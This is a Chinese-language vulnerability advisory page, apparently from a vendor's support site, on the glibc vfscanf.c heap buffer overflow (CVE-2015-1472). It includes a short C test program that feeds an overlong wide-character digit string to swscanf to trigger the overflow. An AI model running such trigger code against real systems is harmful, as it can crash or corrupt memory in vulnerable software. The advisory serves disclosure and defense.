glibc \'stdio-common/vfscanf.c\'堆缓冲区溢出漏洞(CVE-2015-1472)

当前位置：首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

glibc \'stdio-common/vfscanf.c\'堆缓冲区溢出漏洞(CVE-2015-1472)

发表日期：2015-02-09 10:54:24

glibc \'stdio-common/vfscanf.c\'堆缓冲区溢出漏洞(CVE-2015-1472)
BugTraq-ID:72498
CVE-ID:CVE-2015-1472
发布日期：2015-02-03
更新日期：2015-02-05
受影响系统：
GNU glibc
详细信息：

glibc是GNU发布的libc库，即c运行库。glibc是linux系统中底层的api，几乎其它任何运行库都会依赖于glibc。

glibc在stdio-common/vfscanf.c的实现上存在堆缓冲区溢出漏洞，目前影响未知。

来源：
Joseph Myers
测试方法：
警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！int
main (void)
{
wchar_t *s = malloc ((SIZE + 1) * sizeof (*s));
if (s == NULL)
abort ();
for (size_t i = 0; i < SIZE; i++)
s[i] = L\'0\';
s[SIZE] = L\'\\0\';
int i;
if (swscanf (s, L"%d", &i) != 1)
abort ();
if (i != 0)
abort ();
free (s);
return 0;
}
解决办法：
厂商补丁：

GNU
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.gnu.org

服务与支持Support

■服务概述

■在线激活

■产品升级公告

■在线服务

■资料下载

glibc \'stdio-common/vfscanf.c\'堆缓冲区溢出漏洞(CVE-2015-1472)